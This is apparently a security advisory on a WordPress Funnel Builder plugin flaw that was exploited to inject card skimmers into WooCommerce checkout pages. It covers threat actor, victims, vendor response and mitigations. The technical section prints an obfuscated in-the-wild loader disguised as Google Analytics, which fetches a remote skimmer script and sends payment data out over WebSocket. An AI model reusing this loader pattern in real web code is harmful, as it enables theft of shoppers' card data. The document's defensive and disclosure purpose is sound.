Funnel Builder Plugin Vulnerability Exploited in WooCommerce Checkout Skimming Campaign; Security Patch Available

Executive Summary

A critical vulnerability affecting FunnelKit’s Funnel Builder plugin for WordPress was exploited by attackers to inject malicious checkout-skimming code into WooCommerce websites. Security researchers observed exploitation activity targeting vulnerable plugin versions prior to remediation.

The vulnerability affected a plugin with more than 40,000 installations. Following disclosure, FunnelKit released version 3.15.0.3, coordinated update deployment through the WordPress ecosystem, and reported attacker infrastructure associated with the campaign.

Organizations using FunnelKit should verify that all installations have been updated to a secure version and review website logs, checkout pages, and administrative activity for indicators of compromise.

Threat Actor Profile

The exploitation campaign exhibits strong alignment with the tactics, techniques, and procedures (TTPs) of Magecart-style cybercriminal groups, notorious for targeting e-commerce platforms with web skimming malware. These actors are financially motivated, highly skilled in obfuscation, and adept at leveraging supply chain vulnerabilities in popular plugins such as Funnel Builder. The attackers utilize infrastructure mimicking legitimate analytics services, such as spoofed Google Analytics or Tag Manager domains, to evade detection and maximize dwell time. While no specific advanced persistent threat (APT) group has been formally attributed, the operational sophistication and monetization strategy are consistent with established Magecart collectives.

Technical Analysis of Malware/TTPs

The vulnerability in Funnel Builder arises from an unauthenticated arbitrary option update flaw. Specifically, the plugin exposes a public checkout endpoint that, in versions prior to 3.15.0.3, lacks adequate permission checks and method restrictions. This allows remote attackers to invoke internal methods and write arbitrary data into the plugin’s global settings.

Attackers exploit this by injecting JavaScript into the “External Scripts” configuration. The injected code is executed on every WooCommerce checkout page, enabling real-time skimming of payment data. The malicious payload is typically obfuscated and masquerades as a legitimate analytics script. For example, observed payloads use base64-encoded URLs and asynchronous script loading to fetch secondary JavaScript from attacker-controlled domains such as analytics-reports[.]com.

A representative payload observed in the wild is as follows:

(function(i, s, o, g, r) {
  window.addEventListener("load", function() {
    a = s.createElement(o);
    a.async = 1;
    a.src = atob(r);
    s.body.appendChild(a);
  });
})(
  window,
  document,
  "script",
  "www.google-analytics.com/analytics.js",
  "aHR0cHM6Ly9hbmFseXRpY3MtcmVwb3J0cy5jb20vd3NzL2pxdWVyeS1saWIuanM="
);

The base64 string decodes to https://analytics-reports[.]com/wss/jquery-lib.js, which loads a secondary script establishing a WebSocket connection to wss://protect-wss[.]com/ws. Through this channel, a customized skimmer is streamed to the victim’s browser, capturing and exfiltrating payment data in real time.

Key technical indicators include the presence of unfamiliar scripts in the FunnelKit “External Scripts” setting, especially those referencing non-Google domains, and outbound WebSocket connections to suspicious endpoints. The malware is highly evasive, leveraging legitimate-looking domains and asynchronous loading to bypass traditional security controls.

Exploitation in the Wild

The vulnerability was first identified and reported by Sansec, a leading e-commerce security research firm, which observed active exploitation across thousands of WooCommerce stores. The attack pattern closely mirrors previous Magecart campaigns, with skimmers disguised as analytics scripts and rapid deployment across vulnerable sites.

Victim sites are typically compromised via automated scanning and exploitation of the vulnerable endpoint, followed by injection of the skimmer payload. The attackers then harvest payment data from unsuspecting customers during the checkout process. Stolen data is exfiltrated via WebSocket to attacker infrastructure and is believed to be monetized through dark web carding markets.

The campaign affected a plugin installed on more than 40,000 WordPress websites; security researchers observed active exploitation of vulnerable versions before remediation measures were deployed. The attack is global in scope, affecting e-commerce operators in all regions where WooCommerce and Funnel Builder are deployed.

Vendor Response

Following publication of this article, FunnelKit provided additional details regarding its response to the vulnerability. According to FunnelKit:

• A patched version (3.15.0.3) was released within 36 hours of the initial report.
• Security advisories were distributed to users.
• The WordPress.org plugin team assisted in deploying security updates to existing installations.
• The fix was backported across supported versions.
• Known attacker infrastructure associated with the campaign was reported and subsequently DNS-blocked.

FunnelKit further stated that, based on an internal review of more than 1,300 customer websites conducted after remediation efforts began, only a limited number of compromises were identified before updates reached affected systems.

FunnelKit further stated that the security fix was automatically distributed through the WordPress.org ecosystem and backported to supported release lines, allowing many merchants to receive protection without manually upgrading to a newer major version.

Rescana has not independently verified these figures. Organizations should continue to validate that all installations are fully updated and conduct compromise assessments where appropriate.

Victimology and Targeting

The primary targets are e-commerce businesses operating WordPress sites with the Funnel Builder plugin installed, particularly those running versions prior to 3.15.0.3. The attack is indiscriminate, affecting small businesses and large retailers alike, with no evidence of sector-specific or geographic targeting. The common denominator is the use of the vulnerable plugin in conjunction with WooCommerce checkout functionality.

Victims include online merchants processing credit card payments, with customer data at risk during the checkout process. The impact extends to end customers, whose payment information may be stolen and subsequently used for fraudulent transactions or sold on underground markets.

Mitigation and Countermeasures

Immediate action is required to mitigate this threat. All organizations using Funnel Builder must update to version 3.15.0.3 or later via the WordPress dashboard. After patching, administrators should review the FunnelKit “External Scripts” setting under Settings > Checkout and remove any unfamiliar or suspicious scripts, particularly those referencing non-Google domains.

A comprehensive malware scan should be conducted using reputable tools such as Sansec eComscan or equivalent, to detect and remove any residual skimmers or backdoors. It is also recommended to review web server logs for evidence of unauthorized option updates or suspicious HTTP requests to the public checkout endpoint.

The vendor patch introduces robust permission checks and restricts the vulnerable endpoint to an allow-list of safe methods, effectively closing the attack vector. Ongoing monitoring for indicators of compromise, such as outbound connections to analytics-reports[.]com or protect-wss[.]com, is advised.

Organizations should also consider implementing web application firewalls (WAFs) with rules to block known malicious domains and enhance monitoring of checkout page scripts. Regular plugin updates and security reviews are essential to prevent future exploitation.

Risk Assessment

Conclusion

This incident highlights the continuing risk posed by vulnerable WordPress plugins in e-commerce environments. While FunnelKit has released patches and taken remediation measures, organizations should verify that all installations have been updated and assess whether compromise occurred prior to patch deployment. Rapid patching, continuous monitoring, and regular security reviews remain critical for protecting customer payment information and maintaining trust in online commerce platforms.

References

BleepingComputer: Funnel Builder WordPress plugin bug exploited to steal credit cards https://www.bleepingcomputer.com/news/security/funnel-builder-wordpress-plugin-bug-exploited-to-steal-credit-cards/

Sansec Research: Critical FunnelKit vulnerability threatens 40,000+ WooCommerce checkouts https://sansec.io/research/funnelkit-woocommerce-vulnerability-exploited

Sansec LinkedIn Advisory https://www.linkedin.com/posts/sansec_a-critical-vulnerability-in-funnel-builder-activity-7460783153562132480-ttT7

WPScan Vulnerability Entry https://wpscan.com/vulnerability/d553cff4-074a-44e7-aebe-e61c86ab8042/

Wordfence Threat Intelligence https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/funnel-builder/funnelkit-funnel-builder-for-woocommerce-checkout-31501-unauthenticated-sql-injection

Reddit Discussion https://www.reddit.com/r/cybersecurity/comments/1tesp1q/funnel_builder_wordpress_plugin_bug_exploited_to/

About Rescana

Rescana is a leader in third-party risk management (TPRM), providing organizations with advanced tools to continuously monitor, assess, and mitigate cyber risks across their digital supply chain. Our platform empowers security teams to identify vulnerabilities, track emerging threats, and ensure compliance with industry best practices. For more information or to discuss your organization’s security posture, we are happy to answer questions at ops@rescana.com.